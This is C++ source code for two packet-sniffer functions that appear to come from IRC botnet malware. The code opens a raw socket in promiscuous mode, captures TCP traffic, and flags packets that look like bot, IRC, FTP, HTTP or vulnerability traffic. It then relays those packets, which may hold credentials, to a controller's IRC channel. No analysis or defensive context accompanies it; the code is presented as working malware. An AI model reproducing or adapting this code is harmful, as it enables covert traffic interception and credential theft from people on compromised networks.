void *CSniffer::Run() { int sock; sockaddr_in addr_in; hostent *hEnt; IPHEADER *ipHeader; TCPHEADER *tcpHeader; char *szPacket; char szName[255]={0}; unsigned long lLocalIp; addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; gethostname(szName, sizeof(szName)); hEnt=gethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); addr_in.sin_addr.s_addr=lLocalIp; sock=socket(AF_INET,SOCK_RAW,IPPROTO_IP); if(sock==INVALID_SOCKET) return NULL; if(bind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { #ifdef _WIN32 closesocket(sock); #else close(sock); #endif // _WIN32 return NULL; } #ifdef WIN32 int optval=1; DWORD dwBytesRet; if(WSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) { closesocket(sock); return NULL; } #endif // WIN32 char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; while(g_pMainCtrl->m_bRunning) { // Clear the buffer memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; // Wait till the sniffer is enabled while(!g_pMainCtrl->m_cBot.sniffer_enabled.bValue) Sleep(1000); // Read the raw packet #ifdef _WIN32 iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0); #else iRead=recv(sock, szRecvBuf, sizeof(szRecvBuf), 0); #endif // _WIN32 // Process if its a TCP/IP packet if(ipHeader->proto==6) { tcpHeader=(TCPHEADER*)(szRecvBuf+sizeof(*ipHeader)); int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25 && iSrcPort!=g_pMainCtrl->m_cBot.si_port.iValue && iDestPort!=g_pMainCtrl->m_cBot.si_port.iValue) { sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); for(int i=0; i<strlen(szPacket); i++) { if(szPacket[i]=='\r') szPacket[i]='\x20'; if(szPacket[i]=='\n') szPacket[i]='\x20'; } if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) { g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) { g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) { g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); } else if(IsSuspiciousHTTP(szPacket)) { g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.sniffer_channel.sValue.Str(), "HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); } else if(IsSuspiciousVULN(szPacket)) { g_pMainCtrl->m_cIRC.SendFormat(false, false, g_pMainCtrl->m_cBot.vuln_channel.sValue.Str(), "VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"\n", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); } } } } return NULL; }
DWORD WINAPI SnifferThread(LPVOID param) { SNIFFER sniff = *((SNIFFER *)param); SNIFFER *sniffs = (SNIFFER *)param; sniffs->gotinfo = TRUE; char sendbuf[IRCLINE]; int sock; sockaddr_in addr_in; hostent *hEnt; IPHEADER *ipHeader; tcp_hdr_sniffer *tcpHeader; char *szPacket; char szName[255]={0}; unsigned long lLocalIp; addr_in.sin_family=AF_INET; addr_in.sin_port=0; addr_in.sin_addr.s_addr=0; fgethostname(szName, sizeof(szName)); hEnt=fgethostbyname(szName); memcpy(&lLocalIp, hEnt->h_addr_list[0], hEnt->h_length); addr_in.sin_addr.s_addr=lLocalIp; sock=fsocket(AF_INET,SOCK_RAW,IPPROTO_IP); if(sock==INVALID_SOCKET) return NULL; if(fbind(sock, (sockaddr*)&addr_in, sizeof(sockaddr))==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 bind() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } int optval=1; DWORD dwBytesRet; if(fWSAIoctl(sock, SIO_RCVALL, &optval, sizeof(optval), NULL, 0, &dwBytesRet, NULL, NULL)==SOCKET_ERROR) { sprintf(sendbuf, "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 WSAIoctl() failed, returned %d", fWSAGetLastError()); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); addlog(sendbuf); fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); } char szRecvBuf[65535]; ipHeader=(IPHEADER*)szRecvBuf; int iRead; while(1) { // Clear the buffer memset(szRecvBuf, 0, sizeof(szRecvBuf)); iRead=0; // Read the raw packet iRead=frecv(sock, szRecvBuf, sizeof(szRecvBuf), 0); // Process if its a TCP/IP packet if(ipHeader->proto==6) { tcpHeader=(tcp_hdr_sniffer*)(szRecvBuf+sizeof(*ipHeader)); int iSrcPort, iDestPort; char szSrcHost[2048], szDestHost[2048]; iSrcPort=ntohs(tcpHeader->th_sport); iDestPort=ntohs(tcpHeader->th_dport); if(iSrcPort !=110 && iSrcPort!=25 && iDestPort !=110 && iDestPort!=25) { sprintf(szSrcHost, "%s", inet_ntoa(to_in_addr(ipHeader->sourceIP))); sprintf(szDestHost, "%s", inet_ntoa(to_in_addr(ipHeader->destIP))); szPacket=(char*)(szRecvBuf+sizeof(*tcpHeader)+sizeof(*ipHeader)); for(int i=0; i<(int)strlen(szPacket); i++) { if(szPacket[i]=='\r') szPacket[i]='\x20'; if(szPacket[i]=='\n') szPacket[i]='\x20'; } if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousBot(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 Bot sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousIRC(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 IRC sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(iSrcPort!=80 && iDestPort!=80 && IsSuspiciousFTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 FTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousHTTP(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 HTTP sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } else if(IsSuspiciousVULN(szPacket)) { _snprintf(sendbuf, sizeof(sendbuf), "4<<12[\x03\x34\2SNIFFER\2\x03]4>>12 VULN sniff \"%s:%d\" to \"%s:%d\": - \"%s\"", szSrcHost, iSrcPort, szDestHost, iDestPort, szPacket); if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice); } } } } fclosesocket(sock); clearthread(sniff.threadnum); ExitThread(0); return 0; }